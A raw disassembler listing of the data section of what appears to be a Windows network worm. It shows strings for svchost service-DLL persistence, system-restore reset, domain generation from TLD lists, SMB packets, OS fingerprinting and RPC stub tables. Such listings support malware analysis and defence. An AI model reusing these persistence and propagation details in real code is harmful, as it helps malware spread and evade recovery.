aN08x08x08x db 'n%08x%08x%08x',0 ; DATA XREF: sub_9AC911+A2�o
align 4
; char aW08x08x08x[]
aW08x08x08x db 'w%08x%08x%08x',0 ; DATA XREF: sub_9ACABE+310�o
; sub_9ACABE+4B3�o
align 4
; char aL08x08x08x[]
aL08x08x08x db 'l%08x%08x%08x',0 ; DATA XREF: sub_9ACABE+9C�o
; sub_9ACABE+433�o
align 4
aWindows_0: ; DATA XREF: .text:009B9B18�o
unicode 0, <Windows>,0
aUpdate: ; DATA XREF: .text:009B9B14�o
unicode 0, <Update>,0
align 4
aUniversal: ; DATA XREF: .text:009B9B10�o
unicode 0, <Universal>,0
aTime: ; DATA XREF: .text:009B9B0C�o
unicode 0, <Time>,0
align 4
aTask: ; DATA XREF: .text:009B9B08�o
unicode 0, <Task>,0
align 10h
aSystem_0: ; DATA XREF: .text:009B9B04�o
unicode 0, <System>,0
align 10h
aSupport: ; DATA XREF: .text:009B9B00�o
unicode 0, <Support>,0
aShell: ; DATA XREF: .text:009B9AFC�o
unicode 0, <Shell>,0
aServer_0: ; DATA XREF: .text:009B9AF8�o
unicode 0, <Server>,0
align 4
aSecurity_0: ; DATA XREF: .text:009B9AF4�o
unicode 0, <Security>,0
align 10h
aNetwork: ; DATA XREF: .text:009B9AF0�o
unicode 0, <Network>,0
aMonitor_0: ; DATA XREF: .text:009B9AEC�o
unicode 0, <Monitor>,0
aMicrosoft_0: ; DATA XREF: .text:009B9AE8�o
unicode 0, <Microsoft>,0
aManager_0: ; DATA XREF: .text:009B9AE4�o
unicode 0, <Manager>,0
aInstaller: ; DATA XREF: .text:009B9AE0�o
unicode 0, <Installer>,0
aImage: ; DATA XREF: .text:009B9ADC�o
unicode 0, <Image>,0
aHelper: ; DATA XREF: .text:009B9AD8�o
unicode 0, <Helper>,0
align 4
aDriver: ; DATA XREF: .text:009B9AD4�o
unicode 0, <Driver>,0
align 4
aConfig: ; DATA XREF: .text:009B9AD0�o
unicode 0, <Config>,0
align 4
aCenter: ; DATA XREF: .text:009B9ACC�o
unicode 0, <Center>,0
align 4
aBoot: ; DATA XREF: .text:off_9B9AC8�o
unicode 0, <Boot>,0
align 10h
; char aResetsr[]
aResetsr db 'ResetSR',0 ; DATA XREF: sub_9AD00D+22�o
; char LibFileName[]
LibFileName db 'srclient.dll',0 ; DATA XREF: sub_9AD00D+C�o
align 4
stru_9A4678 _msEH <0FFFFFFFFh, offset loc_9AD048, offset loc_9AD04C>
; DATA XREF: sub_9AD00D+2�o
align 8
dword_9A4688 dd 0FFFFFFFFh, 9AD242h, 9AD246h, 0 ; DATA XREF: sub_9AD062+5�o
stru_9A4698 _msEH <0FFFFFFFFh, offset loc_9AD331, offset loc_9AD335>
; DATA XREF: sub_9AD271+2�o
align 8
aSoftwareMicr_1: ; DATA XREF: sub_9AD3ED+F�o
unicode 0, <SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost>,0
align 4
; const WCHAR aServicedll
aServicedll: ; DATA XREF: sub_9AD50E+1B9�o
unicode 0, <ServiceDll>,0
align 4
; const WCHAR SubKey
SubKey: ; DATA XREF: sub_9AD50E+196�o
unicode 0, <Parameters>,0
align 4
; const WCHAR aDescription
aDescription: ; DATA XREF: sub_9AD50E+17E�o
unicode 0, <Description>,0
; const WCHAR aObjectname
aObjectname: ; DATA XREF: sub_9AD50E+163�o
unicode 0, <ObjectName>,0
align 4
; BYTE Data
Data: ; DATA XREF: sub_9AD50E+15B�o
unicode 0, <LocalSystem>,0
; const WCHAR aImagepath
aImagepath: ; DATA XREF: sub_9AD50E+14F�o
unicode 0, <ImagePath>,0
; const WCHAR aErrorcontrol
aErrorcontrol: ; DATA XREF: sub_9AD50E+131�o
unicode 0, <ErrorControl>,0
align 4
; const WCHAR aStart
aStart: ; DATA XREF: sub_9AD50E+117�o
unicode 0, <Start>,0
; const WCHAR aType
aType: ; DATA XREF: sub_9AD50E+FD�o
unicode 0, <Type>,0
align 4
; const WCHAR ValueName
ValueName: ; DATA XREF: sub_9AD50E+EA�o
unicode 0, <DisplayName>,0
align 10h
aSystemCurrentc: ; DATA XREF: sub_9AD50E+60�o
unicode 0, <SYSTEM\CurrentControlSet\Services\>,0
align 4
aSystemrootSyst: ; DATA XREF: sub_9AD50E+1C�o
unicode 0, <%SystemRoot%\system32\svchost.exe -k >,0
; char aRundll32_exe_0[]
aRundll32_exe_0 db 'rundll32.exe "%s",%s',0 ; DATA XREF: sub_9AD71D+163�o
align 4
; wchar_t aNetsvcs
aNetsvcs: ; DATA XREF: sub_9AD71D+F4�o
unicode 0, <netsvcs>,0
; wchar_t asc_9A48AC
asc_9A48AC: ; DATA XREF: sub_9AD71D+A3�o
unicode 0, < >,0
a_biz db '.biz',0 ; DATA XREF: .text:009B9D8C�o
align 4
a_info db '.info',0 ; DATA XREF: .text:009B9D88�o
align 10h
a_org db '.org',0 ; DATA XREF: .text:009B9D84�o
align 4
a_net db '.net',0 ; DATA XREF: .text:009B9D80�o
align 10h
a_com db '.com',0 ; DATA XREF: .text:009B9D7C�o
align 4
a_ws db '.ws',0 ; DATA XREF: .text:009B9D78�o
a_cn db '.cn',0 ; DATA XREF: .text:009B9D74�o
a_cc db '.cc',0 ; DATA XREF: .text:off_9B9D70�o
aDec db 'Dec',0 ; DATA XREF: .text:009B9D6C�o
aNov db 'Nov',0 ; DATA XREF: .text:009B9D68�o
aOct db 'Oct',0 ; DATA XREF: .text:009B9D64�o
aSep db 'Sep',0 ; DATA XREF: .text:009B9D60�o
aAug db 'Aug',0 ; DATA XREF: .text:009B9D5C�o
aJul db 'Jul',0 ; DATA XREF: .text:009B9D58�o
aJun db 'Jun',0 ; DATA XREF: .text:009B9D54�o
aMay db 'May',0 ; DATA XREF: .text:009B9D50�o
aApr db 'Apr',0 ; DATA XREF: .text:009B9D4C�o
aMar db 'Mar',0 ; DATA XREF: .text:009B9D48�o
aFeb db 'Feb',0 ; DATA XREF: .text:009B9D44�o
aJan db 'Jan',0 ; DATA XREF: .text:off_9B9D40�o
aW3_org db 'w3.org',0 ; DATA XREF: .text:009B9D3C�o
align 4
aAsk_com db 'ask.com',0 ; DATA XREF: .text:009B9D38�o
aYahoo_com db 'yahoo.com',0 ; DATA XREF: .text:009B9D30�o
align 10h
aGoogle_com db 'google.com',0 ; DATA XREF: .text:009B9D2C�o
align 4
aBaidu_com db 'baidu.com',0 ; DATA XREF: .text:off_9B9D28�o
align 4
; char Delim[]
Delim db ', ',0 ; DATA XREF: sub_9ADA6E+36�o
align 10h
dbl_9A4950 dq 0.626454564 ; DATA XREF: sub_9ADC21+A6�r
; char aHttpSSearch?qD[]
aHttpSSearch?qD db 'http://%s/search?q=%d',0 ; DATA XREF: sub_9ADCF2+15�o
align 10h
stru_9A4970 _msEH <0FFFFFFFFh, offset loc_9ADFAC, offset loc_9ADFB0>
; DATA XREF: sub_9ADD9B+5�o
align 10h
unk_9A4980 db 81h ; ; DATA XREF: sub_9AE3FA+5D�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
dword_9A49CC dd 2F000000h, 424D53FFh, 72h, 4 dup(0) ; DATA XREF: sub_9AE3FA+A7�o
dd 25C0000h, 0
dd 2000C00h, 4C20544Eh, 2E30204Dh, 3231h
dword_9A4A00 dd 49000000h, 424D53FFh, 73h, 4 dup(0) ; DATA XREF: sub_9AE3FA+EF�o
dd 25C0000h, 0
dd 0FF0Dh, 2FFFF00h, 25C00h, 2 dup(0)
dd 1000000h, 0B000000h, 4D000000h, 4C430053h, 544E4549h
dd 0
; char aUnix[]
aUnix db 'unix',0 ; DATA XREF: sub_9AE3FA:loc_9AE649�o
align 4
; char aWindows4_0[]
aWindows4_0 db 'windows 4.0',0 ; DATA XREF: sub_9AE3FA:loc_9AE636�o
; char aWindows5_0[]
aWindows5_0 db 'windows 5.0',0 ; DATA XREF: sub_9AE3FA:loc_9AE624�o
; char aWindows5_1[]
aWindows5_1 db 'windows 5.1',0 ; DATA XREF: sub_9AE3FA:loc_9AE612�o
; char aServicePack2[]
aServicePack2 db 'service pack 2',0 ; DATA XREF: sub_9AE3FA:loc_9AE5E8�o
align 4
; char aWindowsServer2[]
aWindowsServer2 db 'windows server 2003',0 ; DATA XREF: sub_9AE3FA:loc_9AE5C8�o
; char aServicePack[]
aServicePack db 'service pack',0 ; DATA XREF: sub_9AE3FA:loc_9AE5AD�o
; sub_9AE3FA:loc_9AE5FA�o
align 10h
; char aServicePack1[]
aServicePack1 db 'service pack 1',0 ; DATA XREF: sub_9AE3FA+19E�o
; sub_9AE3FA+1DC�o
align 10h
aVista db 'vista',0 ; DATA XREF: sub_9AE3FA+188�o
align 4
stru_9A4AC8 _msEH <0FFFFFFFFh, offset loc_9AE663, offset loc_9AE667>
; DATA XREF: sub_9AE3FA+2�o
dd 676E70h ; DATA XREF: .text:009B9DA4�o
aJpeg db 'jpeg',0 ; DATA XREF: .text:009B9DA0�o
align 10h
dword_9A4AE0 dd 666967h ; DATA XREF: .text:009B9D9C�o
dword_9A4AE4 dd 706D62h ; DATA XREF: .text:off_9B9D98�o
; char aHttp1_0200OkPr[]
aHttp1_0200OkPr db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_9AE6A2+240�o
db 'Pragma: no-cache',0Dh,0Ah
db 'Content-Length: %u',0Dh,0Ah
db 'Content-Type: image/%s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char aMacintosh[]
aMacintosh db 'macintosh',0 ; DATA XREF: sub_9AE6A2+1D8�o
align 4
; char aLinux[]
aLinux db 'linux',0 ; DATA XREF: sub_9AE6A2+1CA�o
align 10h
; char aLwp[]
aLwp db 'lwp::',0 ; DATA XREF: sub_9AE6A2+1BC�o
align 4
; char aWget[]
aWget db 'wget',0 ; DATA XREF: sub_9AE6A2+1AE�o
align 10h
; char aWindowsNt5_[]
aWindowsNt5_ db 'windows nt 5.',0 ; DATA XREF: sub_9AE6A2+1A0�o
align 10h
; char aUserAgent[]
aUserAgent db 0Dh,0Ah ; DATA XREF: sub_9AE6A2+176�o
db 'user-agent:',0
align 10h
; char asc_9A4B80[]
asc_9A4B80 db 0Dh,0Ah ; DATA XREF: sub_9AE6A2+162�o
db 0Dh,0
; char aGetSHttp[]
aGetSHttp db 'get /%s http/',0 ; DATA XREF: sub_9AE6A2+75�o
align 8
stru_9A4B98 _msEH <0FFFFFFFFh, offset loc_9AE9D1, offset loc_9AE9D5>
; DATA XREF: sub_9AE6A2+5�o
align 8
dword_9A4BA8 dd 44h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 3, 8A885D04h
; DATA XREF: .text:pStubDescriptor�o
dd 11C91CEBh, 8E89Fh, 6048102Bh, 2, 7 dup(0)
dd 48320000h, 0
dd 180000h, 400024h, 7080647h, 30003h, 0B0000h, 20000h
dd 4011Bh, 4800D6h, 80008h, 0C2150h, 1A0008h, 0E80010h
dd 140070h, 48320008h, 0
dd 140001h, 80008h, 3080547h, 1, 0B0000h, 20000h, 4010Bh
dd 4800EEh, 80008h, 0C2113h, 7000F4h, 80010h, 4832h, 20000h
dd 80010h, 4460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 700008h, 8000Ch, 4832h
dd 30000h, 24001Ch, 7470040h, 30708h, 3, 0Bh, 0B0002h
dd 20004h, 8011Bh, 48019Ch, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
dd 180004h, 80008h, 3080647h, 1, 0B0000h, 20000h, 4010Bh
dd 10B00EEh, 0EE0008h, 0C0048h, 21130008h, 1AE0010h, 140070h
dd 48320008h, 0
dd 180005h, 240024h, 5080646h, 10000h, 0B0000h, 20000h
dd 4010Bh, 4800EEh, 80008h, 0C010Bh, 1A01E8h, 0E80010h
dd 140070h, 48320008h, 0
dd 0C0006h, 80000h, 1080346h, 0
dd 0B0000h, 20000h, 4010Bh, 7000EEh, 80008h, 4832h, 70000h
dd 10h, 4460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 7000EEh, 8000Ch, 4832h
dd 80000h, 24001Ch, 7470040h, 30708h, 3, 0Bh, 0B0002h
dd 20004h, 8011Bh, 4802BEh, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
a@:
dw 9
unicode 0, < $@>
dd 7080847h, 30003h, 0B0000h, 20000h, 4000Bh, 0B0002h
dd 20008h, 0C011Bh, 480350h, 80010h, 142150h, 1A0008h
dd 0E80018h, 1C0070h, 48320008h, 0
dd 14000Ah, 80010h, 3080547h, 1, 0B0000h, 20000h, 40048h
dd 480008h, 80008h, 0C2113h, 700362h, 80010h, 4832h, 0B0000h
dd 8000Ch, 3460008h, 108h, 0
dd 0Bh, 480002h, 80004h, 80070h, 48320008h, 0
dd 20000Ch, 400024h, 7080847h, 60006h, 0B0000h, 20000h
dd 4000Bh, 0B0002h, 20008h, 0C011Bh, 48057Ch, 80010h, 142150h
dd 1A0008h, 0E80018h, 1C0070h, 48320008h, 0
dd 10000Dh, 80000h, 1080446h, 0
dd 0B0000h, 20000h, 4000Bh, 0B0002h, 20008h, 0C0070h, 48320008h
dd 0
dd 14000Eh, 240024h, 5080546h, 30000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 58E0008h, 0C001Ah, 7000E8h, 80010h
dd 4832h, 0F0000h, 240018h, 6470040h, 70708h, 7, 0Bh, 11B0002h
dd 7CC0004h, 80048h, 21500008h, 8000Ch, 10001Ah, 7000E8h
dd 80014h, 4832h, 100000h, 80014h, 5470008h, 30308h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 21130008h, 7DE000Ch
dd 100070h, 48320008h, 0
dd 180011h, 240024h, 5080646h, 30000h, 0B0000h, 20000h
dd 4010Bh, 4800EEh, 80008h, 0C010Bh, 1A0828h, 0E80010h
dd 140070h, 48320008h, 0
dd 100012h, 80008h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 4800EEh, 80008h, 0C0070h, 48320008h
dd 0
dd 100013h, 80008h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 4800EEh, 80008h, 0C0070h, 48320008h
dd 0
dd 100014h, 240000h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 215000EEh, 80008h, 0C0070h
dd 48320008h, 0
dd 100015h, 80008h, 3080447h, 1, 0B0000h, 20000h, 40048h
dd 21130008h, 8720008h, 0C0070h, 48320008h, 0
dd 140016h, 240024h, 5080546h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0BA80008h, 0C001Ah, 7000E8h, 80010h
dd 4832h, 170000h, 2C001Ch, 7470040h, 10708h, 1, 0Bh, 480002h
dd 80004h, 8011Bh, 480D46h, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
dd 180018h, 840010h, 1080646h, 0
dd 0B0000h, 20000h, 4000Bh, 480002h, 80008h, 0C0048h, 20120008h
dd 0D5A0010h, 140070h, 48320008h, 0
dd 100019h, 80008h, 5080446h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0D880008h, 0C0070h, 48320008h, 0
dd 18001Ah, 400024h, 7080647h, 90009h, 0B0000h, 20000h
dd 4011Bh, 480FD0h, 80008h, 0C2150h, 1A0008h, 0E80010h
dd 140070h, 48320008h, 0
dd 10001Bh, 80008h, 5080446h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0D880008h, 0C0070h, 48320008h, 0
dd 0C001Ch, 700000h, 1080346h, 0
dd 0B0000h, 20000h, 42012h, 700FDEh, 80008h, 4832h, 1D0000h
dd 100014h, 5460008h, 108h, 0
dd 0Bh, 0B0002h, 20004h, 80048h, 480008h, 8000Ch, 100070h
dd 48320008h, 0
dd 14001Eh, 240008h, 1080546h, 0
dd 0B0000h, 20000h, 4010Bh, 215000EEh, 80008h, 0C0048h
dd 700008h, 80010h
; const unsigned __int8 pFormat
pFormat db 32h ; DATA XREF: sub_9AED38+8�o
db 48h, 2 dup(0)
dd 1F0000h, 2C0020h, 8470024h, 10308h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80113h, 880FFCh, 1008000Ch
dd 10010Bh, 15800EEh, 80014h, 180048h, 700008h, 8001Ch
; const unsigned __int8 byte_9A52DC
byte_9A52DC db 32h ; DATA XREF: sub_9AED5A+8�o
db 48h, 2 dup(0)
dd 200000h, 100018h, 6460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 4800EEh, 8000Ch, 100048h
dd 700008h, 80014h, 4832h, 210000h, 100014h, 5460008h
dd 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 480008h, 8000Ch, 100070h
dd 48320008h, 0
dd 1C0022h, 80018h, 3080747h, 1, 0B0000h, 20000h, 4010Bh
dd 11300EEh, 101A0008h, 0C0088h, 481026h, 80010h, 140048h
dd 700008h, 80018h, 4832h, 230000h, 100018h, 6460008h
dd 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 4800EEh, 8000Ch, 100048h
dd 700008h, 80014h, 4832h, 240000h, 240018h, 6470040h
dd 70708h, 7, 0Bh, 11B0002h, 7CC0004h, 80048h, 21500008h
dd 8000Ch, 10001Ah, 7000E8h, 80014h, 4832h, 250000h, 80014h
dd 5460040h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 1100008h, 1034000Ch
dd 100070h, 48000008h, 0
dd 80026h, 0E030h, 380000h, 2440040h, 108h, 0
dd 118h, 70103Ch, 80004h, 4832h, 270000h, 80018h, 6470008h
dd 10308h, 0
dd 0Bh, 0B0002h, 20004h, 8010Bh, 4800EEh, 8000Ch, 102013h
dd 701040h, 80014h, 4832h, 280000h, 80018h, 6460008h, 508h
dd 1, 0Bh, 0B0002h, 20004h, 8010Bh, 4800EEh, 8000Ch, 10010Bh
dd 700698h, 80014h, 4832h, 290000h, 80010h, 4460008h, 508h
dd 5, 0Bh, 480002h, 80004h, 8010Bh, 70104Ch, 8000Ch, 4832h
dd 2A0000h, 18001Ch, 7460008h, 108h, 0
dd 0Bh, 0B0002h, 20004h, 8000Bh, 480002h, 8000Ch, 100048h
dd 480008h, 80014h, 180070h, 48320008h, 0
dd 0C002Bh, 240000h, 1080346h, 0
dd 0B0000h, 20000h, 42150h, 700008h, 80008h, 4832h, 2C0000h
dd 4C0020h, 8460008h, 508h, 1, 0Bh, 10B0002h, 0EE0004h
dd 8010Ah, 10B107Eh, 0EE000Ch, 10010Bh, 10B00EEh, 10C80014h
dd 180048h, 700008h, 8001Ch, 4832h, 2D0000h, 440010h, 4460008h
dd 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 7000EEh, 8000Ch, 4832h
dd 2E0000h, 4C0014h, 5460008h, 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 4800EEh, 8000Ch, 100070h
dd 48320008h, 0
dd 10002Fh, 80044h, 1080446h, 0
dd 0B0000h, 20000h, 4010Ah, 10B107Eh, 0EE0008h, 0C0070h
dd 48320008h, 0
dd 1C0030h, 80054h, 3080747h, 1, 0B0000h, 20000h, 4010Ah
dd 10B107Eh, 0EE0008h, 0C0048h, 480008h, 80010h, 140113h
dd 7010E0h, 80018h, 4832h, 310000h, 4C0014h, 5460008h
dd 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 4800EEh, 8000Ch, 100070h
dd 48320008h, 0
dd 100032h, 80044h, 1080446h, 0
dd 0B0000h, 20000h, 4010Ah, 10B107Eh, 0EE0008h, 0C0070h
dd 48320008h, 0
a3_0:
unicode 0, <3(\>
dw 8
dd 5080A46h, 10000h, 0B0000h, 20000h, 4010Bh, 4800EEh
dd 80008h, 0C0048h, 10B0008h, 0EE0010h, 14010Ah, 10B107Eh
dd 0EE0018h, 1C010Bh, 4810C8h, 80020h, 240070h, 48320008h
dd 0
dd 0C0034h, 80000h, 7080347h, 10001h, 0B0000h, 20000h
dd 4201Bh, 7010ECh, 80008h, 4832h, 350000h, 80010h, 4460008h
dd 508h, 5, 0Bh, 480002h, 80004h, 8010Bh, 701124h, 8000Ch
dd 2 dup(0)
db 2 dup(0)
word_9A57BA dw 0 ; DATA XREF: .text:pStubDescriptor�o
dd 5C250812h, 0CE0011h, 8082Bh, 1FFFCh, 40002h, 2, 0A0000h
dd 1, 52h, 380012h, 40316h, 5C465C4Bh, 0
dd 5C250812h, 5B5C085Bh, 4031Bh, 18h, 5C4B0001h, 44948h
dd 10000h, 0
dd 5C250812h, 0CD004C5Bh, 3165BFFh, 5C4B0008h, 45C46h
dd 120004h, 85BFFD0h, 125B08h, 316004Ch, 5C4B0010h, 5C46h
dd 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh, 31B5B08h
dd 180010h, 10000h, 49485C4Bh, 10h, 2, 8120000h, 85C25h
dd 8120008h, 4C5B5C25h, 5BFFB900h, 80316h, 5C465C4Bh, 40004h
dd 0FFC80012h, 5B08085Bh, 8031Ah, 0
dd 29004C08h, 0C115BFFh, 8125C08h, 8115C08h, 4115C25h
dd 82B0002h, 80028h, 20001h, 20004h, 0
dd 1000Ah, 80000h, 120000h, 12FF18h, 11FF62h, 82B0082h
dd 0FFFC0008h, 20001h, 20004h, 0
dd 1FEF8h, 40000h, 120000h, 316004Eh, 5C4B0014h, 5C46h
dd 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh, 5B5C0808h
dd 14031Bh, 18h, 5C4B0001h, 144948h, 20000h, 0
dd 5C250812h, 80008h, 5C250812h, 0B7004C5Bh, 3165BFFh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 31A5B08h, 8, 4C080000h
dd 5BFF7500h, 20411h, 28082Bh, 1000Ch, 40002h, 4, 0FF500000h
dd 1, 3EA0010h, 0E0000h, 3EBh, 0FF3Eh, 0FF640012h, 20012h
dd 40315h, 115B08h, 82B0002h, 80028h, 20001h, 40004h, 0
dd 1FF16h, 0FFD60000h, 3EAh, 3EBFFD4h, 0FF040000h, 110000h
dd 82B00ACh, 0FFFC0008h, 20001h, 20004h, 0
dd 1000Ah, 2C0000h, 120000h, 31B0012h, 180004h, 10000h
dd 0FF9E004Ch, 3165B5Ch, 5C4B0008h, 45C46h, 120004h, 85BFFE2h
dd 125B08h, 3160050h, 5C4B001Ch, 145C46h, 8120014h, 5C465C25h
dd 180018h, 5C250812h, 808085Bh, 8080808h, 31B5B5Ch, 18001Ch
dd 10000h, 49485C4Bh, 1Ch, 140002h, 8120014h, 185C25h
dd 8120018h, 4C5B5C25h, 5BFFB500h, 80316h, 5C465C4Bh, 40004h
dd 0FFC80012h, 5B08085Bh, 8031Ah, 0
dd 4B004C08h, 115BFFh, 82B0082h, 0FFFC0008h, 20001h, 20004h
dd 2, 3FF4Eh, 40000h, 120000h, 316004Eh, 5C4B0014h, 0C5C46h
dd 812000Ch, 5C465C25h, 100010h, 5C250812h, 808085Bh, 5B5C0808h
dd 14031Bh, 18h, 5C4B0001h, 144948h, 20000h, 0C000Ch, 5C250812h
dd 100010h, 5C250812h, 0B7004C5Bh, 3165BFFh, 5C4B0008h
dd 45C46h, 120004h, 85BFFC8h, 31A5B08h, 8, 4C080000h, 5BFF7500h
dd 20411h, 28082Bh, 10008h, 40002h, 20002h, 0FE660000h
dd 3, 4, 0FF700012h, 1F80011h, 8082Bh, 1FFFCh, 40002h
dd 5, 0FC8E0000h, 1, 20016h, 740000h, 0Ah, 1F600E6h, 1420000h
dd 120000h, 316004Eh, 5C4B0018h, 5C46h, 8120000h, 5C465C25h
dd 40004h, 5C250812h, 808085Bh, 5B080808h, 18031Bh, 18h
dd 5C4B0001h, 184948h, 20000h, 0
dd 5C250812h, 40004h, 5C250812h, 0B7004C5Bh, 3165BFFh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 125B08h, 3160062h
dd 5C4B001Ch, 5C46h, 8120000h, 5C465C25h, 40004h, 5C250812h
dd 185C46h, 8120018h, 85B5C25h, 8080808h, 5B5C0808h, 1C031Bh
dd 18h, 5C4B0001h, 1C4948h, 30000h, 0
dd 5C250812h, 40004h, 5C250812h, 180018h, 5C250812h, 0A3004C5Bh
dd 3165BFFh, 5C4B0008h, 45C46h, 120004h, 85BFFC0h, 125B08h
dd 316004Ch, 5C4B0010h, 5C46h, 8120000h, 5C465C25h, 40004h
dd 5C250812h, 808085Bh, 31B5B08h, 180010h, 10000h, 49485C4Bh
dd 10h, 2, 8120000h, 45C25h, 8120004h, 4C5B5C25h, 5BFFB900h
dd 80316h, 5C465C4Bh, 40004h, 0FFC80012h, 5B08085Bh, 740012h
dd 200316h, 5C465C4Bh, 0
dd 5C250812h, 45C46h, 8120004h, 5C465C25h, 180018h, 5C250812h
dd 1C5C46h, 812001Ch, 85B5C25h, 8080808h, 5B080808h, 20031Bh
dd 18h, 5C4B0001h, 204948h, 40000h, 0
dd 5C250812h, 40004h, 5C250812h, 180018h, 5C250812h, 1C001Ch
dd 5C250812h, 91004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h
dd 85BFFB8h, 31A5B08h, 8, 4C080000h, 5BFDFF00h, 20011h
dd 28082Bh, 10004h, 40002h, 9, 0FB700000h, 1, 2002Eh, 4C0000h
dd 1F6h, 3EC0082h, 0FB580000h, 3EEh, 5DDFC1Ch, 0C40000h
dd 3EDh, 1F5FC10h, 0FB440000h, 120000h, 3160002h, 5C4B000Ch
dd 5C46h, 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh
dd 125B5Ch, 3160002h, 5C4B0020h, 5C46h, 8120000h, 5C465C25h
dd 80008h, 5C250812h, 185C46h, 8120018h, 5C465C25h, 1C001Ch
dd 5C250812h, 808085Bh, 8080808h, 125B08h, 1B000Eh, 180001h
dd 10020h, 3165B02h, 5C4B0028h, 5C46h, 8120000h, 5C465C25h
dd 80008h, 5C250812h, 185C46h, 8120018h, 5C465C25h, 1C001Ch
dd 5C250812h, 245C46h, 120024h, 85BFFBEh, 2 dup(8080808h)
dd 125B08h, 1B000Eh, 180001h, 10000h, 3165B02h, 5C4B0008h
dd 45C46h, 120004h, 85BFFE6h, 115B08h, 82B011Eh, 0FFFC0008h
dd 20001h, 50004h, 0
dd 1F964h, 160000h, 2, 1F60052h, 9E0000h, 1F5h, 0F99Ah
dd 2C0012h, 0C031Bh, 18h, 5C4B0001h, 0C4948h, 20000h, 0
dd 5C250812h, 80008h, 5C250812h, 0CF004C5Bh, 3165BFEh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 125B08h, 31B003Ch
dd 180020h, 10000h, 49485C4Bh, 20h, 4, 8120000h, 85C25h
dd 8120008h, 185C25h, 8120018h, 1C5C25h, 812001Ch, 4C5B5C25h
dd 5BFEA100h, 80316h, 5C465C4Bh, 40004h, 0FFB80012h, 5B08085Bh
dd 440012h, 28031Bh, 18h, 5C4B0001h, 284948h, 50000h, 0
dd 5C250812h, 80008h, 5C250812h, 180018h, 5C250812h, 1C001Ch
dd 5C250812h, 240024h, 0FE880012h, 8F004C5Bh, 3165BFEh
dd 5C4B0008h, 45C46h, 120004h, 85BFFB0h, 31A5B08h, 8, 4C080000h
dd 5BFED900h, 20411h, 28082Bh, 10008h, 40002h, 9, 0F9200000h
dd 1, 2FDDEh, 0FDFC0000h, 1F6h, 3ECFE32h, 0F9080000h, 3EEh
dd 5DDF9CCh, 0FE740000h, 3EDh, 1F5F9C0h, 0F8F40000h, 110000h
dd 82B0002h, 80028h, 20001h, 90004h, 0
dd 1F8D6h, 0FD940000h, 2, 1F6FDB2h, 0FDE80000h, 3ECh, 3EEF8BEh
dd 0F9820000h, 5DDh, 3EDFE2Ah, 0F9760000h, 1F5h, 0F8AAh
dd 20411h, 28082Bh, 10004h, 40002h, 64003Bh, 1600000h
dd 65h, 660172h, 1920000h, 192h, 19301C4h, 2080000h, 1F6h
dd 1F70258h, 26E0000h, 257h, 3ED02A8h, 0F85C0000h, 453h
dd 3F2F920h, 0F91A0000h, 3F8h, 3F9F914h, 0F90E0000h, 3FAh
dd 5DDF908h, 0F9020000h, 5DEh, 5DFF8FCh, 0F8F60000h, 5E2h
dd 5E5F8F0h, 0F8EA0000h, 5E6h, 5E7F8E4h, 0F8DE0000h, 5E8h
dd 5E9F8D8h, 0F8D20000h, 5EAh, 5EBF8CCh, 0F8C60000h, 5ECh
dd 5EEF8C0h, 0F8BA0000h, 5F0h, 5F1F8B4h, 0F8AE0000h, 5F2h
dd 5F3F8A8h, 0F8A20000h, 5F4h, 5F5F89Ch, 0F8960000h, 5F8h
dd 5F9F890h, 0F88A0000h, 5FAh, 5FDF884h, 0F87E0000h, 5FEh
dd 5FFF878h, 0F8720000h, 600h, 601F86Ch, 0F8660000h, 602h
dd 603F860h, 0F85A0000h, 604h, 605F854h, 0F84E0000h, 606h
dd 607F848h, 0F8420000h, 608h, 609F83Ch, 0F8360000h, 60Ah
dd 60BF830h, 0F82A0000h, 60Ch, 60DF824h, 0F81E0000h, 60Eh
dd 610F818h, 0F8120000h, 611h, 612F80Ch, 0F8060000h, 613h
dd 614F800h, 0F7FA0000h, 120000h, 3160002h, 5C4B0008h
dd 45C46h, 8120004h, 85B5C25h, 125B08h, 3160002h, 5C4B0018h
dd 45C46h, 8120004h, 5C465C25h, 140014h, 5C250812h, 808085Bh
dd 5B080808h, 20012h, 340316h, 5C465C4Bh, 40004h, 5C250812h
dd 145C46h, 8120014h, 5C465C25h, 300030h, 5C250812h, 808085Bh
dd 2 dup(8080808h), 5B5C0808h, 20012h, 7C0316h, 5C465C4Bh
dd 0C000Ch, 5C250812h, 1C5C46h, 812001Ch, 5C465C25h, 780078h
